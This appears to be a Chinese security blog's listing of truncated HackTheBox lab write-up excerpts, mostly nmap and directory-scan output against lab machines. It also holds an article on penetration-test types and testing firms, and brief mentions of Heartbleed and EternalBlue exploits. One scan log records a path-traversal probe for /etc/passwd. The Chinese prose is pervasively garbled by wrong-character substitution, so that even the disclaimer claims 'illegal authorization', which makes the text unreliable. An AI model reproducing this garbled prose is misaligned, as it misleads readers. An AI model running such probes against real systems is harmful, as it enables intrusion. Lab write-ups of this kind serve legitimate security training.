免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/htb/Blunder]└─# nmap -sV -Pn 10.10.10.191 -p- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-21 01:34 ESTNmap scan report for 10.10.10.191Host is up (0.30s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION21/tcp closed ftp80/tcp open http Apache httpd 2.4.41 ((Ubuntu))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 33.09 seconds21端口曾经被敞开了，只有80端口一个方向，先爆破看看。 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/htb/Bounty]└─# nmap -sV -Pn 10.10.10.93 -p- 1 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 22:37 ESTNmap scan report for 10.10.10.93Host is up (0.27s latency).Not shown: 65534 filtered portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 7.5Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 360.04 seconds目录爆破└─# gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -x aspx ===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.10.93[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Timeout: 10s===============================================================2021/12/16 22:44:15 Starting gobuster in directory enumeration mode===============================================================/transfer.aspx (Status: 200)/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/] ===============================================================2021/12/16 22:46:25 Finished===============================================================transfer.aspx是一个文件上传页面 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现这个靶机十分的不稳固，先用--open参数看看有哪些端口关上 ┌──(rootkali)-[~/htb/Sunday]└─# nmap -p- 10.10.10.76 --openStarting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 09:22 ESTStats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 1.35% done; ETC: 09:32 (0:09:46 remaining)Nmap scan report for 10.10.10.76Host is up (0.30s latency).Not shown: 44865 filtered ports, 20665 closed portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE79/tcp open finger111/tcp open rpcbind22022/tcp open unknown47097/tcp open unknown58984/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 653.01 seconds指定端口，获取服务详细信息看看 ...

前言：浸透测试是指平安业余人员在零碎所有者的许可下，模仿对网络或计算机系统的攻打以评估其安全性的过程。不过，只管是“模仿”攻打，但浸透测试员同样会把事实世界中攻击者的所有工具和技术都用到指标零碎上，只是他们并不以发现的破绽或获取的信息用来牟利，而是将后果上报给所有者，以帮忙其进步零碎安全性。 因为浸透测试人员遵循与歹意黑客雷同的攻打策略，所以他们有时候被称为“道德黑客”或“白帽黑客”。浸透测试能够由团队或独立黑客进行，他们可能是指标公司的外部员工，也可能独立工作或为提供业余浸透测试服务的平安公司工作。 从狭义上讲，浸透测试的工作形式与真正尝试毁坏组织系统的形式完全相同。浸透测试人员首先会检查和辨认与指标组织关联的主机、端口和网络服务。随后，他们将钻研此攻击面中的潜在破绽，这一步骤须要对指标零碎进行更深刻、更具体的探测。最初，他们将尝试冲破指标的边界并拜访受爱护的数据或管制他们的零碎。 当然，浸透测试和事实攻打的细节可能会有很大差别。但须要留神的是，测试人员必须当时与指标组织约定进行的确切测试类型以及模仿攻打的范畴，免得对用户零碎造成不可控的毁坏。 浸透测试的类型利用平安公司Contrast Security将浸透测试类型分为以下多个类别： ▶内部浸透测试。采纳这种形式时，浸透测试团队将从一个近程地位来评估指标网络基础设施，他们没有任何指标网络外部拓扑等相干信息，齐全模仿实在网络环境中的内部攻击者，采纳风行的攻打技术与工具，有组织、有步骤地对指标组织进行逐渐浸透与入侵，揭示指标网络中一些已知或未知的安全漏洞，并评估这些破绽是否被利用获取控制权或造成业务资产的损失。 ▶外部浸透测试。进行内部测试的团队将能够理解到对于指标环境的所有外部与底层常识，因而能够让浸透测试者以最小的代价发现和验证零碎中较重大的安全漏洞。内部测试揭示了心怀不满的员工、怀有歹意的承包商或越界的超级黑客如何入侵零碎。 ▶盲测（blind test）。盲测模仿来自攻击者端的“实在”攻打。浸透测试员不会取得无关组织网络或零碎的任何信息，这迫使他们依赖公开可用的信息或依附本身技能收集的信息。 ▶“双盲”测试（double-blind test）。双盲测试同样模仿了指标组织端的实在攻打，但在这种类型的测试中，IT和平安人员并不知道正在进行浸透测试的事实，以确保测试公司的实在平安态势。 ▶针对性测试。针对性测试，有时也称为“开灯测试”，指的是浸透测试人员和指标组织的IT人员在专一于网络基础设施特定方面的特定场景中进行模仿“反抗游戏”。针对性测试通常比其余选项须要更少的工夫或精力，但不能提供无关系统安全态势的残缺视图。 浸透测试步骤尽管不同类型的浸透测试都有其独到之处，但行业专家开发的浸透测试执行规范（PTES）总结了大多数浸透测试场景都会波及的七个次要步骤： ▶口头前交涉：任何浸透测试都应该由测试人员和指标组织当时确定测试的范畴和指标，最好以书面形式确定。 ▶情报收集：测试人员应首先对指标进行侦察以收集尽可能多的信息，该过程可能包含收集无关指标组织的开源情报或公开可用的信息。 ▶威逼建模：在这个阶段，浸透测试人员应该对潜在的实在攻击者能力和动机进行建模，并尝试确定指标组织内的哪些指标可能会吸引攻击者留神。 ▶破绽剖析：正式进行浸透测试时，这可能是大多数人思考的外围问题，即剖析指标组织的基础设施是否存在容许黑客入侵的安全漏洞。 ▶破绽利用：在此阶段，浸透测试人员应用他们发现的破绽进入指标组织系统，并窃取数据。这一步的指标不仅仅是冲破他们的边界，而是绕过主动防御措施并尽可能长时间不被发现。 ▶后破绽利用：在该阶段，浸透测试员会试图放弃对受损零碎的控制权，并确定它们的价值。对于浸透测试人员与其客户之间的关系而言，这可能是一个特地奥妙的阶段。在这一阶段，比拟重要的是，第一阶段的“口头前交涉”生成一套明确定义的根本规定，以爱护客户并确保要害服务未受到测试的负面影响。 ▶报告：最初，测试人员必须向客户提供一份对于危险和破绽的全面而翔实的报告。在这一过程中，分明传播这些信息所需的沟通技巧无疑是较为重要的一点。 寰球支流的浸透测试公司浸透测试是科技行业的一个业余畛域，迄今为止始终在抵制整合。换句话说，有很多公司提供浸透测试服务，其中一些作为更大的产品套件的一部分，还有一些专门从事道德黑客攻击。上面为大家介绍5家支流的浸透测试公司： 1. a1qa a1qa 是一家来自科罗拉多州莱克伍德的软件测试公司，在其17年的经营中，曾经交付了1,500多个胜利我的项目并建设了10个卓越核心。它已与500多家公司建设单干，从小型企业到财产500强巨头。该公司的次要客户包含阿迪达斯、卡巴斯基实验室、SAP、Yandex、Forex Club 等。 a1qa 专门提供全周期 QA 和测试服务，包含全面的平安浸透测试。其特长包含测试门户网站、电子商务、媒体和电子学习平台、游戏和在线赌场等网络应用程序，以及业务线测试，例如 CRM 、合作、文档治理和财务零碎。该公司还经营了一个专门的平安测试实验室。 2. QA Mentor 2010年成立于纽约的 QA Mentor 曾经胜利建设了弱小的寰球影响力，在寰球设有12个测试中心。其团队由300名通过认证的 QA 业余人员组成，他们胜利实现了870多个我的项目，其中包含亚马逊、eBay、博世、HTC等我的项目。该公司提供30多项测试服务，其中包含网络安全浸透测试。 QA Mentor 在 Clutch、GoodFirms 和 Gartner 等钻研机构的报告中，目前均处于行业领导者象限中。 3. UnderDefense UnderDefense 是一家通过认证的计算机和网络安全公司，于2016 年在纽约成立。它提供宽泛的测试服务，特地专一于平安浸透测试。该公司曾经执行了数百次浸透测试，包含特定合规性测试、应用程序和无线网络浸透测试以及社会工程平安测试。UnderDefense 曾多次取得 Clutch 的奖项。 4. Iflexion Iflexion 成立于1999年，是一家全周期软件开发公司。现在，该公司已倒退成为领有850多名IT业余人员的企业。其专业知识涵盖从利用程序开发到测试的宽泛服务。Iflexion 已与来自不同行业的500多家公司建设单干，包含PayPal、飞利浦、阿迪达斯、eBay、施乐、Expedia、毕马威等。 5. KiwiQA KiwiQA成立于2009 年，是一家国内质量保证和征询公司，领有超过100名专业人士团队，曾经交付了2,000多个我的项目。他们的软件测试专业知识涵盖自动化、手动和翻新测试技术。公司的平安测试范畴包含道德黑客攻击、网络安全浸透测试和破绽审计。KiwiQA 被 GoodFirms 和 Clutch 评为“顶级测试公司”。 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/htb/SwagShop]└─# nmap -sV -sC 10.10.10.140 -p-Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-15 03:57 ESTNmap scan report for 10.10.10.140Host is up (0.26s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Did not follow redirect to http://swagshop.htb/Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1190.67 seconds先把靶机增加到host文件echo "10.10.10.140 swagshop.htb" >> /etc/hosts ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/htb/Arctic]└─# nmap -Pn -sV 10.10.10.11 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-14 10:26 ESTNmap scan report for 10.10.10.11Host is up (0.26s latency).Not shown: 65532 filtered portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC8500/tcp open fmtp?49154/tcp open msrpc Microsoft Windows RPCService Info: OS: Windows; CPE: cpe:/o:microsoft:windows连个web服务都没有，一下子有点懵。。8500端口不太常见，尝试在浏览器上关上，十分慢，然而存在一个文件遍历破绽 Index of /CFIDE/ dir 03/22/17 08:52 cfdocs/ dir 03/22/17 08:55 上面门路是一个cms的登录页面 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/htb/Valentine]└─# nmap -sC -sV 10.10.10.79 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 08:49 ESTNmap scan report for 10.10.10.79Host is up (0.31s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)80/tcp open http Apache httpd 2.2.22 ((Ubuntu))|_http-server-header: Apache/2.2.22 (Ubuntu)|_http-title: Site doesn't have a title (text/html).443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US| Not valid before: 2018-02-06T00:45:25|_Not valid after: 2019-02-06T00:45:25|_ssl-date: 2021-12-12T13:50:23+00:00; +1s from scanner time.Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel由开启服务得悉，也是一个以web浸透为主的靶机，照例先看看web上有什么文件信息 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/htb/Mirai]└─# nmap -Pn -sV 10.10.10.48 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-11 07:58 ESTNmap scan report for 10.10.10.48Host is up (0.31s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) 53/tcp open domain dnsmasq 2.76 80/tcp open http lighttpd 1.4.35 1935/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) 32400/tcp open http Plex Media Server httpd 32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel80端口有一个cms的登录页面cms名称： Pi-hole版本： Pi-hole Version v3.1.4 Web Interface Version v3.1 FTL Version v2.10 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/htb/Nibbles]└─# nmap -sC -sV 10.10.10.75 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-11 03:53 ESTNmap scan report for 10.10.10.75Host is up (0.26s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Site doesn't have a title (text/html).Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.75 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.75/_21-12-11_03-56-40.txtError Log: /root/dirsearch/logs/errors-21-12-11_03-56-40.logTarget: http://10.10.10.75/[03:56:41] Starting: [03:57:40] 200 - 93B - /index.html 只有一个index页面，关上页面显示 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测otkali)-[~/htb/Sense]└─# nmap -sV -Pn 10.10.10.60 1 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 09:15 ESTNmap scan report for 10.10.10.60Host is up (0.36s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION80/tcp open http lighttpd 1.4.35443/tcp open ssl/http lighttpd 1.4.35只开了http服务，那只能从web动手了 目录爆破┌──(rootkali)-[~/dirsearch]└─# gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -u https://10.10.10.60/ -t 30 -k 1 ⨯===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: https://10.10.10.60/[+] Method: GET[+] Threads: 30[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Timeout: 10s===============================================================2021/12/09 09:30:38 Starting gobuster in directory enumeration mode===============================================================/classes (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]/css (Status: 301) [Size: 0] [--> https://10.10.10.60/css/] /favicon.ico (Status: 200) [Size: 1406] /includes (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]/index.html (Status: 200) [Size: 329] /index.php (Status: 200) [Size: 6690] /installer (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]/javascript (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]/themes (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/] /tree (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/] /widgets (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/] /xmlrpc.php (Status: 200) [Size: 384] 另外用dirserch找到一个文件Changelog.txt ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/htb/Beep]└─# nmap -sV -Pn 10.10.10.7 -p- 130 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 01:07 ESTNmap scan report for 10.10.10.7Host is up (0.33s latency).Not shown: 65519 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)25/tcp open smtp Postfix smtpd80/tcp open http Apache httpd 2.2.3110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4111/tcp open rpcbind 2 (RPC #100000)143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4443/tcp open ssl/https?879/tcp open status 1 (RPC #100024)993/tcp open ssl/imap Cyrus imapd995/tcp open pop3 Cyrus pop3d3306/tcp open mysql MySQL (unauthorized)4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)4445/tcp open upnotifyp?4559/tcp open hylafax HylaFAX 4.3.105038/tcp open asterisk Asterisk Call Manager 1.110000/tcp open http MiniServ 1.570 (Webmin httpd)Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1565.01 seconds开了好多端口，事实当中端口越多破绽越多，然而具体到这些靶机，很可能意味着很多兔子洞，所以枚举的时候肯定要小心分辨 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测─(rootkali)-[~/htb/buff]└─# nmap -sV -Pn 10.10.10.198 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-01 07:24 ESTNmap scan report for 10.10.10.198Host is up (0.42s latency).Not shown: 65533 filtered portsPORT STATE SERVICE VERSION7680/tcp open pando-pub?8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 750.50 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.198:8080/ _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.198-8080/-_21-12-01_07-29-25.txtError Log: /root/dirsearch/logs/errors-21-12-01_07-29-25.logTarget: http://10.10.10.198:8080/[07:29:30] Starting: [07:30:04] 200 - 66B - /.gitattributes [07:30:31] 200 - 309B - /Readme.md [07:30:31] 200 - 309B - /README.md[07:30:31] 200 - 309B - /ReadMe.md[07:30:31] 200 - 309B - /README.MD [07:30:31] 200 - 18KB - /LICENSE[07:30:32] 301 - 344B - /Upload -> http://10.10.10.198:8080/Upload/ [07:30:32] 403 - 1KB - /Trace.axd::$DATA [07:30:47] 200 - 5KB - /about.php [07:32:06] 403 - 1KB - /cgi-bin/ [07:32:07] 403 - 1KB - /cgi.pl/ [07:32:08] 400 - 983B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [07:32:11] 200 - 1KB - /cgi-bin/printenv.pl [07:32:16] 200 - 4KB - /contact.php [07:32:27] 200 - 4KB - /edit.php [07:32:28] 403 - 1KB - /error/ [07:32:32] 200 - 4KB - /feedback.php [07:32:42] 200 - 143B - /home.php [07:32:43] 301 - 341B - /img -> http://10.10.10.198:8080/img/ [07:32:44] 403 - 1KB - /include/ [07:32:44] 301 - 345B - /include -> http://10.10.10.198:8080/include/ [07:32:45] 403 - 1KB - /index.php::$DATA [07:32:47] 200 - 5KB - /index.php [07:32:47] 200 - 5KB - /index.php/login/[07:32:47] 200 - 5KB - /index.php. [07:32:47] 200 - 5KB - /index.pHp [07:32:53] 200 - 18KB - /license [07:33:22] 301 - 345B - /profile -> http://10.10.10.198:8080/profile/ [07:33:24] 200 - 309B - /readme.md [07:33:26] 200 - 137B - /register.php [07:33:29] 403 - 1KB - /server-info [07:33:46] 200 - 209B - /up.php [07:33:47] 301 - 344B - /upload -> http://10.10.10.198:8080/upload/ [07:33:48] 403 - 1KB - /upload/ [07:33:48] 200 - 107B - /upload.php [07:33:53] 403 - 1KB - /web.config::$DATA [07:33:55] 403 - 1KB - /webalizer 爆出了很多文件，一个个查看 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/htb/Antique]└─# nmap -sV -Pn 10.10.11.107Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 ESTNmap scan report for 10.10.11.107Host is up (0.39s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION23/tcp open telnet?1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NULSF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPaSF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetReSF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\xSF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nPSF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatusSF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nPSF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPasswordSF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(KerbSF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswoSF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDirSF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalSSF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDirSF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirecSF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20JetSF:Direct\n\nPassword:\x20");Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds23端口开了一个telnet服务，nc连上去看看 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/htb/Blocky]└─# nmap -sV -Pn 10.10.10.37 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 22:40 ESTNmap scan report for 10.10.10.37Host is up (0.34s latency).Not shown: 65530 filtered portsPORT STATE SERVICE VERSION21/tcp open ftp ProFTPD 1.3.5a22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))8192/tcp closed sophos25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 696.03 seconds开了ftp，ssh，http三个服务 ...

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。服务探测┌──(rootkali)-[~/htb/Knife]└─# nmap -sV -Pn 10.10.10.242 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-27 23:34 ESTNmap scan report for 10.10.10.242Host is up (0.34s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 60.42 seconds目录爆破┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.242 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.242/_21-11-27_23-34-49.txtError Log: /root/dirsearch/logs/errors-21-11-27_23-34-49.logTarget: http://10.10.10.242/[23:34:50] Starting: [23:36:09] 200 - 6KB - /index.php [23:36:09] 200 - 6KB - /index.php/login/ 如同没有啥特地有用的页面或者目录 ...

首先nmap 让咱们来找找IIS 6.0的破绽 CVEDETAILS没找到相应的间接搜，找到CVE-2017-7269CVEDETAILS这里没做好，没链接到相应产品去，也是有poc的

首先nmap SMB匿名登陆 找到VHD文件然而无奈下载，可能是文件太大 mount一下

首先nmap 443关上有危险提醒 看是否有heartbleed破绽 80端口关上只有一个图片，用dirbuster爆破目录 msf利用heartbleed模块

首先nmap win7 sp1 445端口 -> 赫赫有名的永恒之蓝 msf搜利用模块存在破绽上exploit模块然而没有胜利。论坛看到同样状况说是须要重启靶机。重启了也没用，改天再来

